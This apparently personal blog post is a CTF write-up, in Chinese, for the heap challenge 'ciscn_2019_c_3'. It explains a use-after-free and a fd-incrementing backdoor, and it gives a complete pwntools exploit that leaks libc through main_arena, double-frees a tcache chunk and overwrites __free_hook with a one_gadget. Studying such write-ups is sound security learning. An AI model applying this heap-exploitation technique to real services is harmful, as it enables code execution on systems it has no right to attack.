我的技术与生活——ciscn_2019_c_3

开启了全局偏移

add函数，只允许申请固定的几个大小的堆，在堆地址+16的地方写入内容，所以改不了fd和bk地址，堆地址开始写上0，堆地址+8的地址会加上随机数

show函数，会把堆地址上的几个数分别打印出来，可以打印出main_arena+96的地址

delete函数，存在很明显的UAF漏洞

还有个后面函数，可以改堆fd位置的东西，每次能使其加一，后面能改其bin指针

先malloc大小为0x100的堆，然后释放8次，然后bin才会有main_arena+96,且得先malloc大小是0x100大小的堆

add(0x100,'aaaa') #0
add(0x60,'bbbb') #1
for i in range(8):
    delete(0)

然后show的话能接收到其地址

show(0)

p.recvuntil("attack_times: ")
#arena = u64(p.recv(6).ljust(8, b'\x00'))
arena_96=int(p.recvuntil('\n',drop=True))

malloc_hook=arena_96-96-0x10
base=malloc_hook-libc.sym['__malloc_hook']
free_hook=base+libc.sym['__free_hook']
gadget=base+one_gadget

再申请一个堆，这时候会在堆2开始,由于glibc 2.27的特性，会在开始的上方申请堆，这里不太明白为什么要用free_hook-0x10的地址，而不是free_hook

1 2	payload=p64(0)*2+p64(free_hook-0x10) add(0x60,payload) #2

double free然后用backdoor函数20次，fd+0x20,将bin指针指向0x0000562a77ab5280的地址

add(0x60,'aaaa')
add(0x60,'bbbb')
add(0x60,p64(gadget))
delete(1)

exp

from pwn import*
from LibcSearcher import *
#p=remote("node4.buuoj.cn",29798)
p=process("./ciscn_2019_c_3")
context.log_level="debug"
libc=ELF('./libc-2.27.so')
context.arch='amd64'

one_gadget=0x4f322
def add(size,content):
    p.sendlineafter('Command: ','1')
    p.sendlineafter('size: ',str(size))
    p.sendlineafter('Give me the name: ',content)

def show(index):
    p.sendlineafter('Command: ','2')
    p.sendlineafter('index: ',str(index))
   
def delete(index):
    p.sendlineafter('Command: ','3')
    p.sendlineafter('weapon:',str(index))

def back(index):
    p.sendlineafter('Command: ','666')
    p.sendlineafter('weapon:',str(index))



add(0x100,'aaaa') #0
add(0x60,'bbbb') #1

for i in range(8):
    delete(0)

show(0)

p.recvuntil("attack_times: ")
#arena = u64(p.recv(6).ljust(8, b'\x00'))
arena_96=int(p.recvuntil('\n',drop=True))
malloc_hook=arena_96-96-0x10

base=malloc_hook-libc.sym['__malloc_hook']
free_hook=base+libc.sym['__free_hook']
gadget=base+one_gadget


payload=p64(0)*2+p64(free_hook-0x10)#2
add(0x60,payload)

delete(2)
delete(2)


for i in range(0x20):
    back(2)
gdb.attach(p)
sleep(1)
add(0x60,'aaaa')
add(0x60,'bbbb')
print(hex(free_hook))

add(0x60,p64(gadget))

delete(1)
p.interactive()

站点信息

ciscn_2019_c_3

开启了全局偏移

add函数，只允许申请固定的几个大小的堆，在堆地址+16的地方写入内容，所以改不了fd和bk地址，堆地址开始写上0，堆地址+8的地址会加上随机数

show函数，会把堆地址上的几个数分别打印出来，可以打印出main_arena+96的地址

delete函数，存在很明显的UAF漏洞

还有个后面函数，可以改堆fd位置的东西，每次能使其加一，后面能改其bin指针

先malloc大小为0x100的堆，然后释放8次，然后bin才会有main_arena+96,且得先malloc大小是0x100大小的堆

然后show的话能接收到其地址

再申请一个堆，这时候会在堆2开始,由于glibc 2.27的特性，会在开始的上方申请堆，这里不太明白为什么要用free_hook-0x10的地址，而不是free_hook

double free然后用backdoor函数20次，fd+0x20,将bin指针指向0x0000562a77ab5280的地址

exp

评论区

目录

公告栏